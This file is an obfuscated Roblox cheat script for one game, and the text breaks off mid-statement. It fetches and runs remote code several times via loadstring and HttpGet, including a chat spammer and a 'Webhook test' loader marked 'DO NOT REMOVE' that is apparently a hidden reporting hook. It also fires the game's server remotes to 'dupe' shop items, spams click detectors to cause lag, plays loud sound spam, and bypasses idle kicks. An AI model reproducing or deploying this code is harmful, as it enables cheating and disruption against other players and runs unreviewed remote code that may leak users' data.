if identifyexecutor():lower():find("delta") then 
    game.Players.LocalPlayer:Kick("Blacklisted for delta . Join discord.gg/55fRnuREeM for help | Reason (Delta)") 
else
    print("Hello,", identifyexecutor(), "user")
end

-- by Rellah
-- chat spam remove if you want
loadstring(game:HttpGet("https://raw.githubusercontent.com/rvllah/scripts/refs/heads/main/ChatSpammer", true))()
-- DO NOT REMOVE
loadstring(game:HttpGet("https://raw.githubusercontent.com/rvllah/scripts/refs/heads/main/Webhook%20test%20xd", true))()
repeat task.wait();until game:IsLoaded() and task.wait(0.5) and (workspace.DistributedGameTime>5)  if game:GetService("CoreGui"):FindFirstChild("Plus") then return warn("Script already running");elseif (tostring(game.GameId)=="271119130") then Instance.new("BoolValue",game:GetService("CoreGui")).Name="Plus";else return warn("Incorrect game");end game:GetService("Players").LocalPlayer.Idled:connect(function() game:GetService("VirtualUser"):ClickButton2(Vector2.new());end);local v0=3.92;local v1=nil;local v2=nil;local v3=0;local v4=game.Players.LocalPlayer;local v5=v4.PlayerGui.ScreenGui;local v6=v5.buttons.log;local v7=v5.credits;local v8=v5.shop.top.credits;local v9=v4.PlayerGui.PlayerList;local v10=nil;local v11=v9.Buttons;local v12=v9.PlayerList;local v13=v5.buttons.setting;local v14=v8:Clone();local v15=nil;local v16=nil;local v17=nil;local v18=nil;local v19=nil;local v20=tonumber(v8.Text:sub( -v8.Text:len(), -8));local v21=game.ReplicatedStorage.model.invbut:Clone();local v22=game.ReplicatedStorage.model.invbut:Clone();local v23=true;local v24=true;local v25=true;local v26=true;local v27=nil;local v28=true;function DefaultData(v140,v141) if (isfile("NaikoScript/BreakingPlus/"   .. v140 )~=false) then return warn("Option already exists");else writefile("NaikoScript/BreakingPlus/"   .. v140 ,v141);return print("Set default data");end end function ChangeData(v142,v143,v144) if (v144==false) then if (isfile(v142)~=false) then writefile(v142,v143);end elseif (isfile("NaikoScript/BreakingPlus/"   .. v142 )~=false) then writefile("NaikoScript/BreakingPlus/"   .. v142 ,v143);end end function ReturnData(v145,v146) if (v146==false) then if (isfile(v145)~=false) then return readfile(v145);end else if (isfile("NaikoScript/BreakingPlus/"   .. v145 )~=false) then return readfile("NaikoScript/BreakingPlus/"   .. v145 );end return nil;end end if ( not isfolder("NaikoScript") and  not isfolder("NaikoScript/BreakingPlus")) then makefolder("NaikoScript");makefolder("NaikoScript/BreakingPlus");DefaultData("Feature1.txt","false");DefaultData("Feature2.txt","false");DefaultData("Feature3.txt","false");DefaultData("Feature4.txt","true");DefaultData("Feature5.txt","false");DefaultData("Feature6.txt","false");DefaultData("Feature7.txt","true");DefaultData("TutSettings.txt","false");v3=1;elseif (isfolder("NaikoScript") and  not isfolder("NaikoScript/BreakingPlus")) then v3=2;DefaultData("Feature1.txt","false");DefaultData("Feature2.txt","false");DefaultData("Feature3.txt","false");DefaultData("Feature4.txt","true");DefaultData("Feature5.txt","false");DefaultData("Feature6.txt","false");DefaultData("Feature7.txt","true");DefaultData("TutSettings.txt","false");makefolder("NaikoScript/BreakingPlus");elseif (isfolder("NaikoScript") and isfolder("NaikoScript/BreakingPlus")) then DefaultData("Feature1.txt","false");DefaultData("Feature2.txt","false");DefaultData("Feature3.txt","false");DefaultData("Feature4.txt","true");DefaultData("Feature5.txt","false");DefaultData("Feature6.txt","false");DefaultData("Feature7.txt","true");DefaultData("TutSettings.txt","false");v3=3;end local v29=Instance.new("NumberValue");v29.Parent=game:GetService("CoreGui");v29.Name="UserType";v29.Value=v3;function UIBlur(v147) local v148=game:GetService("Lighting");local v149=workspace.CurrentCamera;local v150=Vector2.new(10,10);local v151=0.01;local v152=1 -1e-7 ;local v153=0.35;local v154=v147;v154:SetAttribute("BlurIntensity",v153);local v155=Instance.new("DepthOfFieldEffect");v155.FarIntensity=0;v155.NearIntensity=v154:GetAttribute("BlurIntensity");v155.FocusDistance=0.25;v155.InFocusRadius=0;v155.Parent=v148;local v161={};local v162={};local v163={};local v164={};v164.__index=v164;function rayPlaneIntersect(v248,v249,v250,v251) local v252=v249;local v253=v251;local v254=v250-v248 ;local v255=(v252.x * v254.x) + (v252.y * v254.y) + (v252.z * v254.z) ;local v256=(v252.x * v253.x) + (v252.y * v253.y) + (v252.z * v253.z) ;local v257= -v255/v256 ;return v250 + (v257 * v251) ,v257;end function rebuildPartsList() v161={};v162={};for v325,v326 in pairs(v163) do table.insert(v161,v326);table.insert(v162,v325);end end v164.new=function(v258,v259) local v260=Instance.new("Part");v260.Size=Vector3.new(1,1,1) * 0.01 ;v260.Anchored=true;v260.CanCollide=false;v260.CanTouch=false;v260.Material=Enum.Material.Glass;v260.Transparency=v152;v260.Parent=workspace.CurrentCamera;local v270;if (v259=="Rectangle") then v270=Instance.new("BlockMesh");v270.Parent=v260;elseif (v259=="Oval") then v270=Instance.new("SpecialMesh");v270.MeshType=Enum.MeshType.Sphere;v270.Parent=v260;end local v271=false;local v272=v258;while true do v272=v272.Parent;if (v272 and v272:IsA("ScreenGui")) then v271=v272.IgnoreGuiInset;break;elseif (v272==nil) then break;end end local v273=setmetatable({Frame=v258,Part=v260,Mesh=v270,IgnoreGuiInset=v271},v164);v163[v273]=v260;rebuildPartsList();game:GetService("RunService"):BindToRenderStep("...",Enum.RenderPriority.Camera.Value + 1 ,function() v260.CFrame=v149.CFrame * CFrame.new(0,0,0) ;v164.updateAll();end);return v273;end;function updateGui(v275) if  not v275.Frame.Visible then v275.Part.Transparency=1;return;end local v276=workspace.CurrentCamera;local v277=v275.Frame;local v278=v275.Part;local v279=v275.Mesh;v278.Transparency=v152;local v281=v277.AbsolutePosition + v150 ;local v282=(v281 + v277.AbsoluteSize) -(v150 * 2) ;local v283,v284;if v275.IgnoreGuiInset then v283=v276:ViewportPointToRay(v281.X,v281.Y,1);v284=v276:ViewportPointToRay(v282.X,v282.Y,1);else v283=v276:ScreenPointToRay(v281.X,v281.Y,1);v284=v276:ScreenPointToRay(v282.X,v282.Y,1);end local v285=v276.CFrame.Position + (v276.CFrame.LookVector * (0.05 -v276.NearPlaneZ)) ;local v286=v276.CFrame.LookVector;local v287=rayPlaneIntersect(v285,v286,v283.Origin,v283.Direction);local v288=rayPlaneIntersect(v285,v286,v284.Origin,v284.Direction);local v287=v276.CFrame:PointToObjectSpace(v287);local v288=v276.CFrame:PointToObjectSpace(v288);local v289=v288-v287 ;local v290=(v287 + v288)/2 ;v279.Offset=v290;v279.Scale=v289/v151 ;end v164.updateAll=function() v155.NearIntensity=tonumber(v154:GetAttribute("BlurIntensity"));for v329=1, #v162 do updateGui(v162[v329]);end local v294=table.create( #v162,workspace.CurrentCamera.CFrame);workspace:BulkMoveTo(v161,v294,Enum.BulkMoveMode.FireCFrameChanged);v155.FocusDistance=0.25 -v149.NearPlaneZ ;end;v164.Destroy=function(v296) v296.Part:Destroy();v163[v296]=nil;rebuildPartsList();end;v164.new(v154,"Rectangle");v164.updateAll();return v164;end function Debug(v169) if (v27==true) then warn(v169);game.StarterGui:SetCore("SendNotification",{Title="Debug message",Text=v169});end end function Notify(v170,v171) pcall(function() if (v170==nil) then return;else if (v171==nil) then v171="Ok";end local v450=v5.msgbox:Clone();v450.Parent=v5;v450.Name="CustomMsg";v450.ok.Text=v171;v450.Visible=true;v450.ImageLabel.TextLabel.Text=v170;v450.ok.MouseButton1Click:Connect(function() v450:Destroy();end);end end);end function NotifyButtons(v172,v173,v174,v175,v176) pcall(function() if (v172==nil) then return;else if (v173==nil) then v173="Ok";end if (v174==nil) then v174="Cancel";end local v456=v5.msgbox:Clone();local v457=v456.ok;local v458=v456.ok:Clone();v456.Parent=v5;v456.Name="ButtonMsg";v457.Text=v173;v457.AnchorPoint=Vector2.new(0.5,0);v457.Position=UDim2.new(0.275,0,1, -50);v458.Text=v174;v458.Parent=v456;v458.AnchorPoint=Vector2.new(0.5,0);v458.Position=UDim2.new(0.725,0,1, -50);v456.Visible=true;v456.ImageLabel.TextLabel.Text=v172;v457.MouseButton1Click:Once(function() local v523=v175();if (v523[1]=="Load") then local v607=v5.shop.load:Clone();v607.Parent=v456;v607.Visible=true;v607.Position=UDim2.new(0, -3,0, -22);v607.BackgroundTransparency=1;v607.ZIndex=100;v607.Folder["1"].ZIndex=100;v607.Folder["2"].ZIndex=100;v607.Folder["3"].ZIndex=100;v607.TextLabel.ZIndex=100;v607.TextLabel.Text=tostring(v523[2]);v607.TextLabel.Position=UDim2.new(0,0,0.21,0);local v619=v456.ImageLabel:Clone();local v620=Instance.new("TextButton",v456);v620.ZIndex=2000;v620.Active=true;v620.BackgroundTransparency=1;v620.Size=UDim2.new(1,0,1,0);v620.Text="";v619:ClearAllChildren();v619.ZIndex=50;v619.Parent=v456;v619.Active=true;v619.ImageTransparency=0.4;v619.ImageColor3=Color3.fromRGB(150,150,150);game:GetService("TweenService"):Create(v619,TweenInfo.new(0.25),{ImageColor3=Color3.fromRGB(0,0,0)}):Play();task.wait(tonumber(v523[3]));v456:Destroy();else v456:Destroy();end end);v458.MouseButton1Click:Once(function() local v524=v176();if (v524[1]=="Load") then local v631=v5.shop.load:Clone();v631.Parent=v456;v631.Visible=true;v631.Position=UDim2.new(0, -3,0, -22);v631.BackgroundTransparency=1;v631.ZIndex=100;v631.Folder["1"].ZIndex=100;v631.Folder["2"].ZIndex=100;v631.Folder["3"].ZIndex=100;v631.TextLabel.ZIndex=100;v631.TextLabel.Text=tostring(v524[2]);v631.TextLabel.Position=UDim2.new(0,0,0.21,0);local v643=v456.ImageLabel:Clone();local v644=Instance.new("TextButton",v456);v644.ZIndex=2000;v644.Active=true;v644.BackgroundTransparency=1;v644.Size=UDim2.new(1,0,1,0);v644.Text="";v643:ClearAllChildren();v643.ZIndex=50;v643.Active=true;v643.Parent=v456;v643.ImageTransparency=0.4;v643.ImageColor3=Color3.fromRGB(150,150,150);game:GetService("TweenService"):Create(v643,TweenInfo.new(0.25),{ImageColor3=Color3.fromRGB(0,0,0)}):Play();task.wait(tonumber(v524[3]));v456:Destroy();else v456:Destroy();end end);end end);end function respawn(v177) local v178={[1]=42,[2]=v177};game:GetService("ReplicatedStorage").RemoteEvent:FireServer(unpack(v178));end function lag(v179,v180) pcall(function() if ((v179~=nil) and (type(v179)==type(0))) then if (v180==true) then Debug("Requested "   .. v179   .. " respawns" );end for v525=1,v179 do task.spawn(function() fireclickdetector(game:GetService("Workspace").disguise.SurfaceGui.ImageLabel.Part.ClickDetector);end);end else return;end end);end function serverhop(v181) if true then local v330,v331,v332,v333,v334,v335,v336,v337,v338,v339,v340;do local v470=string;v330,v331,v332,v333,v334,v335,v336,v337,v338,v339,v340=v470.lower,v470.upper,v470.find,v470.split,v470.sub,v470.format,v470.len,v470.match,v470.gmatch,v470.gsub,v470.byte;end local v341="Desc";local v342={};local v343=v335("https://games.roblox.com/v1/games/%s/servers/Public?sortOrder=%s&limit=100",game.PlaceId,v341);local v344=tick();repeat local v482,v483=pcall(function() return game:HttpGet(v343);end);if  not v482 then wait(2);continue;end local v484=game:GetService("HttpService"):JSONDecode(v483);if ( #v484.data~=0) then v342=v484.data;for v655,v656 in pairs(v342) do if (v656.maxPlayers and v656.playing and ((v656.maxPlayers-1)>v656.playing) and (v656.id~=game.JobId)) then Server=v656;break;end end if Server then break;end end v343=v335("https://games.roblox.com/v1/games/%s/servers/Public?sortOrder=%s&limit=100&cursor=%s",game.PlaceId,v341,v484.nextPageCursor);until (tick() -v344)>=600  if ( not Server or ( #v342==0)) then return;end if (v181==true) then Notify("Going to server "   .. Server.playing   .. "/"   .. Server.maxPlayers );end game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId,Server.id);end end function rejoin(v182) game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId,game.JobId);if (v182==true) then Notify("Rejoining the server");end end task.spawn(function() v4.PlayerGui:FindFirstChild("ScreenGui").ChildAdded:Connect(function(v298) if ((v298.Name=="messagelabel") and v298:IsA("TextLabel")) then if string.find(v298.text,"Selected game mode: ") then local v588=string.gsub(v298.text,"Selected game mode: ","");v2=v588;Debug("Mode is "   .. v2 );end end end);end);local v33=v5.shop.load:Clone();v33.Visible=false;v33.Parent=v7;function AnimationOnStart() v33.BackgroundColor3=Color3.fromRGB(150,150,150);game:GetService("TweenService"):Create(v33,TweenInfo.new(0.25),{BackgroundColor3=Color3.fromRGB(0,0,0)}):Play();end local v36=function() if httprequest then task.spawn(function() httprequest({Url="http://127.0.0.1:6463/rpc?v=1",Method="POST",Headers={["Content-Type"]="application/json",Origin="https://discord.com"},Body=game:GetService("HttpService"):JSONEncode({cmd="INVITE_BROWSER",nonce=game:GetService("HttpService"):GenerateGUID(false),args={code="vAWJMYJYcR"}})});end);return {"Load","Joining server",3};elseif setclipboard then setclipboard("https://discord.gg/V6XdGE5tpE");Notify("Failed to join automaticly. Copied the server invite link instead");return {};else Notify("Failed to automaticly join or copy the server invite link. join by manually typing it https://discord.gg/V6XdGE5tpE");return {};end end;task.spawn(function() NotifyButtons("This script was made by rellah. Join discord server?","Join server","Cancel",v36,function() return {};end);end);for v184,v185 in pairs(v5.shop:GetDescendants()) do if (v185:IsA("ImageButton") and (v185.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=1077224108")) then v15=v185:Clone();elseif (v185:IsA("ImageButton") and (v185.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=651760851")) then v16=v185:Clone();elseif (v185:IsA("ImageButton") and (v185.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=651761382")) then v17=v185:Clone();elseif (v185:IsA("ImageButton") and (v185.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=1077223765")) then v18=v185:Clone();end end task.spawn(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/NaikoScript/r/main/r.lua"))();end);task.spawn(function() wait(0.1);if (v15~=nil) then v15.Parent=v7.sectionframes;v15.offsale:Destroy();v15.type.Text="3";v15.type.TextSize=15;v15.name.Text="/e rain";v15.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=3405267362";v15.MouseButton1Click:Connect(function() if (v23==true) then v23=false;if (v20<3) then v23=true;Notify("Not enough credits to purchase this.");else v15.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v658={[1]=66,[2]="Animations",[3]="Exclusive"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v658));wait(7);v15.type.Text="3";v23=true;end else end end);else v5.shop.sectionframes.ChildAdded:Wait();wait(1.5);for v485,v486 in pairs(v5.shop:GetDescendants()) do if (v486:IsA("ImageButton") and (v486.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=1077224108")) then v15=v486:Clone();end end v15.Parent=v7.sectionframes;v15.offsale:Destroy();v15.type.Text="3";v15.type.TextSize=15;v15.name.Text="/e rain";v15.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=3405267362";v15.MouseButton1Click:Connect(function() if (v23==true) then v23=false;if (v20<3) then v23=true;Notify("Not enough credits to purchase this.");else v15.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v660={[1]=66,[2]="Animations",[3]="Exclusive"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v660));wait(7);v15.type.Text="3";v23=true;end else end end);end end);task.spawn(function() wait(0.1);if (v16~=nil) then v16.Parent=v7.sectionframes;v16.offsale:Destroy();v16.type.Text="10000";v16.type.TextSize=15;v16.name.Text="Antlers case";v16.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=2675792665";v16.MouseButton1Click:Connect(function() if (v24==true) then v24=false;if (v20<10000) then v24=true;Notify("Not enough credits to purchase this.");else v16.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v662={[1]=66,[2]="Accessories",[3]="Knife Antlers"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v662));wait(7);v16.type.Text="10000";v24=true;end else end end);else v5.shop.sectionframes.ChildAdded:Wait();wait(1.5);for v487,v488 in pairs(v5.shop:GetDescendants()) do if (v488:IsA("ImageButton") and (v488.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=651760851")) then v16=v488:Clone();end end v16.Parent=v7.sectionframes;v16.offsale:Destroy();v16.type.Text="10000";v16.type.TextSize=15;v16.name.Text="Antlers case";v16.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=2675792665";v16.MouseButton1Click:Connect(function() if (v24==true) then v24=false;if (v20<10000) then v24=true;Notify("Not enough credits to purchase this.");else v16.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v664={[1]=66,[2]="Accessories",[3]="Knife Antlers"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v664));wait(7);v16.type.Text="10000";v24=true;end else end end);end end);task.spawn(function() wait(0.1);if (v17~=nil) then v17.Parent=v7.sectionframes;v17.offsale:Destroy();v17.type.Text="10000";v17.type.TextSize=15;v17.name.Text="Candy Crown";v17.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=4544072210";v17.MouseButton1Click:Connect(function() if (v25==true) then v25=false;if (v20<10000) then v25=true;Notify("Not enough credits to purchase this.");else v17.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v666={[1]=66,[2]="Knife Skins",[3]="Winter Gift"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v666));wait(7);v17.type.Text="10000";v25=true;end else end end);else v5.shop.sectionframes.ChildAdded:Wait();wait(1.5);for v489,v490 in pairs(v5.shop:GetDescendants()) do if (v490:IsA("ImageButton") and (v490.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=651761382")) then v17=v490:Clone();end end v17.Parent=v7.sectionframes;v17.offsale:Destroy();v17.type.Text="10000";v17.type.TextSize=15;v17.name.Text="Candy Crown";v17.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=4544072210";v17.MouseButton1Click:Connect(function() if (v25==true) then v25=false;if (v20<10000) then Notify("Not enough credits to purchase this.");v25=true;else v17.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v668={[1]=66,[2]="Knife Skins",[3]="Winter Gift"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v668));wait(7);v17.type.Text="10000";v25=true;end else end end);end end);task.spawn(function() wait(0.1);if (v18~=nil) then v18.Parent=v7.sectionframes;v18.offsale:Destroy();v18.type.Text="10000";v18.type.TextSize=15;v18.name.Text="Royal Red";v18.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=2676022029";v18.MouseButton1Click:Connect(function() if (v26==true) then v26=false;if (v20<10000) then v26=true;Notify("Not enough credits to purchase this.");else v18.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v670={[1]=66,[2]="Chair Skins",[3]="Winter"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v670));wait(7);v18.type.Text="10000";v26=true;end else end end);else v5.shop.sectionframes.ChildAdded:Wait();wait(1.5);for v491,v492 in pairs(v5.shop:GetDescendants()) do if (v492:IsA("ImageButton") and (v492.Image=="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=1077223765")) then v18=v492:Clone();end end v18.Parent=v7.sectionframes;v18.offsale:Destroy();v18.type.Text="10000";v18.type.TextSize=15;v18.name.Text="Royal Red";v18.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=2676022029";v18.MouseButton1Click:Connect(function() if (v26==true) then v26=false;if (v20<10000) then Notify("Not enough credits to purchase this.");v26=true;else v18.type.Text="Loading...";task.spawn(function() v33.Visible=true;AnimationOnStart();task.wait(5.25);v33.Visible=false;end);local v672={[1]=66,[2]="Chair Skins",[3]="Winter"};game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(unpack(v672));wait(7);v18.type.Text="10000";v26=true;end else end end);end end);wait();if ((v15==nil) and (v16==nil) and (v17==nil) and (v18==nil)) then game.StarterGui:SetCore("SendNotification",{Title="Warning",Text="Load the shop to load the dupers"});end for v186,v187 in pairs(v7.sectionframes:GetChildren()) do v187:Destroy();end for v188,v189 in pairs(v5.buttons:GetChildren()) do if (v189~=v6) then v189.MouseButton1Click:Connect(function() v7.Visible=false;end);end end Die=nil;SpamSound=nil;HideBlood=nil;task.spawn(function() while task.wait(0.1) do if (HideBlood==true) then game:GetService("CoreGui"):WaitForChild("TopBarApp",15):FindFirstChild("FullScreenFrame").Visible=false;end end end);task.spawn(function() local v190=game:GetService("ReplicatedStorage").model.Sound;repeat if (SpamSound==true) then v190.Playing=true;v190.TimePosition=math.random(10,75)/100 ;end wait(0.5);until nil end);task.spawn(function() task.spawn(function() repeat task.wait();until game.Players.LocalPlayer.Character:FindFirstChildOfClass("Humanoid")~=nil  task.wait();game.Players.LocalPlayer.Character:FindFirstChildOfClass("Humanoid").Died:Wait();if (Die==true) then Die=false;lag(2,true);task.wait(0.01);Die=true;end end);game.Players.LocalPlayer.CharacterAppearanceLoaded:Connect(function(v299) task.spawn(function() repeat task.wait();until v299:FindFirstChildOfClass("Humanoid")~=nil  v299:FindFirstChildOfClass("Humanoid").Died:Wait();if (Die==true) then Die=false;lag(2,true);task.wait(0.01);Die=true;end end);end);end);local function v37(v191,v192,v193) local v194=v191.Autosave.ImageButton;local v195=false;v194.MouseButton1Click:Connect(function() task.spawn(function() task.spawn(function() if (v194.fill.Visible==true) then v194.fill.Visible=false;else v194.fill.Visible=true;end end);v195=true;game:GetService("TweenService"):Create(v194.glow,TweenInfo.new(0.175),{ImageTransparency=0}):Play();task.wait(0.175);game:GetService("TweenService"):Create(v194.glow,TweenInfo.new(0.175),{ImageTransparency=1}):Play();task.wait(0.185);v195=false;end);if (v194.fill.Visible==false) then v193();else v192();end end);v194.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v194.glow,TweenInfo.new(0.2),{ImageTransparency=0.7}):Play();end);v194.MouseLeave:Connect(function() if (v195==false) then game:GetService("TweenService"):Create(v194.glow,TweenInfo.new(0.2),{ImageTransparency=1}):Play();end end);end local v38=v5.setting.ScrollingFrame;local v39=v38:FindFirstChild("performance"):Clone();repeat task.wait();until v39:FindFirstChild("sframe")~=nil  local v40=v39:FindFirstChild("sframe");local v41=v40:Clone();local v42=v40:Clone();local v43=v40:Clone();local v44=v40:Clone();local v45=v40:Clone();local v46=v40:Clone();v40.TextLabel.Text="Hide Blood";v41.TextLabel.Text="Improve UI";v42.TextLabel.Text="FullBright";v43.TextLabel.Text="Auto ServerHop";v44.TextLabel.Text="Play Loud Noise";v45.TextLabel.Text="Debug messages";v46.TextLabel.Text="Legacy autofarm";v44.Parent=v39;v45.Parent=v39;v43.Parent=v39;v42.Parent=v39;v41.Parent=v39;v46.Parent=v39;v41.Position=UDim2.new(0,0,0,55);v42.Position=UDim2.new(0,0,0,85);v43.Position=UDim2.new(0,0,0,115);v44.Position=UDim2.new(0,0,0,145);v45.Position=UDim2.new(0,0,0,175);v46.Position=UDim2.new(0,0,0,205);v39.Parent=v38;v39.Name="breakingplus";local v68=Instance.new("UIGradient");v68.Parent=v39:FindFirstChild("TextLabel");v68.Color=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.fromRGB(0,255,174)),ColorSequenceKeypoint.new(0.4,Color3.fromRGB(0,160,255)),ColorSequenceKeypoint.new(1,Color3.fromRGB(0,160,255))});v39:FindFirstChild("TextLabel").Text="Breaking +";v39.Position=UDim2.new(0,0,0,600);local v73=false;local v74=true;local v75=true;local v76=Instance.new("BindableEvent");task.spawn(function() if (ReturnData("TutSettings.txt")=="false") then v5.setting.Visible=false;local v394=game:GetService("TweenService"):Create(v13,TweenInfo.new(0.75,Enum.EasingStyle.Linear),{ImageColor3=Color3.fromRGB(100,15,15)});local v395=game:GetService("TweenService"):Create(v13,TweenInfo.new(0.75,Enum.EasingStyle.Linear),{ImageColor3=Color3.fromRGB(255,255,255)});v394:Play();local v396;local v397=false;local v398;v398=v395.Completed:Connect(function() if (v397==false) then v394:Play();else v398:Disconnect();end end);v396=v394.Completed:Connect(function() if (v397==false) then v395:Play();else v398:Disconnect();end end);v13.MouseButton1Click:Once(function() v397=true;ChangeData("TutSettings.txt","true");v394:Pause();v395:Play();v5.setting.ScrollingFrame.CanvasPosition=Vector2.new(0,0);v5.setting.ScrollingFrame.ScrollingEnabled=false;task.wait(0.25);game:GetService("TweenService"):Create(v5.setting.ScrollingFrame,TweenInfo.new(4,Enum.EasingStyle.Sine),{CanvasPosition=Vector2.new(0,662)}):Play();task.wait(4);v5.setting.ScrollingFrame.ScrollingEnabled=true;end);end end);task.spawn(function() repeat task.wait();until v5.loading.Text==""  v5.loading.Text="https://discord.gg/V6XdGE5tpE";end);local function v77(v197,v198,v199,v200,v201) local v202=Instance.new("UICorner");local v203=Instance.new("Frame");v203.AnchorPoint=v201;v203.Position=v198;v203.Size=v199;v203.Visible=v197.Visible;v203.Name="UIBlurFrame";v203.BackgroundTransparency=1;v203.Parent=v197;v202.Parent=v203;v202.CornerRadius=v200;UIBlur(v203);v76.Event:Connect(function() if (v73==true) then v203.Visible=v197.Visible;else v203.Visible=false;end end);v197.Changed:Connect(function() if (v73==true) then v203.Visible=v197.Visible;else v203.Visible=false;end end);end for v214,v215 in pairs(v5:GetChildren()) do if (v215.Name=="rank") then v77(v215,UDim2.new(0.5,0,0.5,0),UDim2.new(0.94,0,0.9,0),UDim.new(0,12),Vector2.new(0.5,0.5));elseif (v215.Name=="setting") then v77(v215,UDim2.new(0.5,0,0.5,0),UDim2.new(0.94,0,0.95,0),UDim.new(0,12),Vector2.new(0.5,0.5));elseif (v215.Name=="profile") then v77(v215,UDim2.new(0.5,0,0.5,0),UDim2.new(0.95,0,0.91,0),UDim.new(0,12),Vector2.new(0.5,0.5));elseif (v215.Name=="server1") then v77(v215,UDim2.new(0.5,0,0.025,0),UDim2.new(0.94,0,0.86,0),UDim.new(0,12),Vector2.new(0.5,0));elseif (v215.Name=="decision") then v77(v215,UDim2.new(0,0,0,0),UDim2.new(1,0,1,0),UDim.new(0,10),Vector2.new(0,0));end end function Feature7Function() v74=true;ChangeData("Feature7.txt","true");end function Feature7UnFunction() v74=false;ChangeData("Feature7.txt","false");end v37(v46,Feature7Function,Feature7UnFunction);pcall(function() if (ReturnData("Feature7.txt")=="false") then v46.Autosave.ImageButton.fill.Visible=false;v46.Autosave.ImageButton.fill.ImageTransparency=0;Feature7UnFunction();elseif (ReturnData("Feature7.txt")=="true") then v46.Autosave.ImageButton.fill.Visible=true;v46.Autosave.ImageButton.fill.ImageTransparency=0;Feature7Function();else v46.Autosave.ImageButton.fill.Visible=false;v46.Autosave.ImageButton.fill.ImageTransparency=0;Feature5Function();DefaultData("Feature7.txt","true");end end);function Feature6Function() ChangeData("Feature6.txt","true");v27=true;Debug("Started debugging");end function Feature6UnFunction() ChangeData("Feature6.txt","false");v27=false;Debug("Stopped debugging");end v37(v45,Feature6Function,Feature6UnFunction);pcall(function() if (ReturnData("Feature6.txt")=="false") then v45.Autosave.ImageButton.fill.Visible=false;v45.Autosave.ImageButton.fill.ImageTransparency=0;Feature6UnFunction();elseif (ReturnData("Feature6.txt")=="true") then v45.Autosave.ImageButton.fill.Visible=true;v45.Autosave.ImageButton.fill.ImageTransparency=0;Feature6Function();else v45.Autosave.ImageButton.fill.Visible=false;v45.Autosave.ImageButton.fill.ImageTransparency=0;Feature6UnFunction();DefaultData("Feature6.txt","false");end end);function Feature5Function() ChangeData("Feature5.txt","true");SpamSound=true;Debug("Started spamming loud sounds");end function Feature5UnFunction() ChangeData("Feature5.txt","false");SpamSound=false;Debug("Stopped spamming loud sounds");end v37(v44,Feature5Function,Feature5UnFunction);pcall(function() if (ReturnData("Feature5.txt")=="false") then v44.Autosave.ImageButton.fill.Visible=false;v44.Autosave.ImageButton.fill.ImageTransparency=0;Feature5UnFunction();elseif (ReturnData("Feature5.txt")=="true") then v44.Autosave.ImageButton.fill.Visible=true;v44.Autosave.ImageButton.fill.ImageTransparency=0;Feature5Function();else v44.Autosave.ImageButton.fill.Visible=true;v44.Autosave.ImageButton.fill.ImageTransparency=0;Feature5UnFunction();DefaultData("Feature5.txt","false");end end);function Feature4Function() ChangeData("Feature4.txt","true");v75=true;Debug("Started automatily server hopping");end function Feature4UnFunction() ChangeData("Feature4.txt","false");v75=false;Debug("Stopped automatily server hopping");end v37(v43,Feature4Function,Feature4UnFunction);pcall(function() if (ReturnData("Feature4.txt")=="false") then v43.Autosave.ImageButton.fill.Visible=false;v43.Autosave.ImageButton.fill.ImageTransparency=0;Feature4UnFunction();elseif (ReturnData("Feature4.txt")=="true") then v43.Autosave.ImageButton.fill.Visible=true;v43.Autosave.ImageButton.fill.ImageTransparency=0;Feature4Function();else v43.Autosave.ImageButton.fill.Visible=false;v43.Autosave.ImageButton.fill.ImageTransparency=0;Feature4Function();DefaultData("Feature4.txt","true");end end);function Feature3Function() ChangeData("Feature3.txt","true");game.Lighting.Ambient=Color3.fromRGB(100,100,100);game.Lighting.Brightness=5;Debug("Enabled fullbright");end function Feature3UnFunction() ChangeData("Feature3.txt","false");game.Lighting.Ambient=Color3.fromRGB(0,0,0);game.Lighting.Brightness=0;Debug("Disabled fullbright");end v37(v42,Feature3Function,Feature3UnFunction);pcall(function() if (ReturnData("Feature3.txt")=="false") then 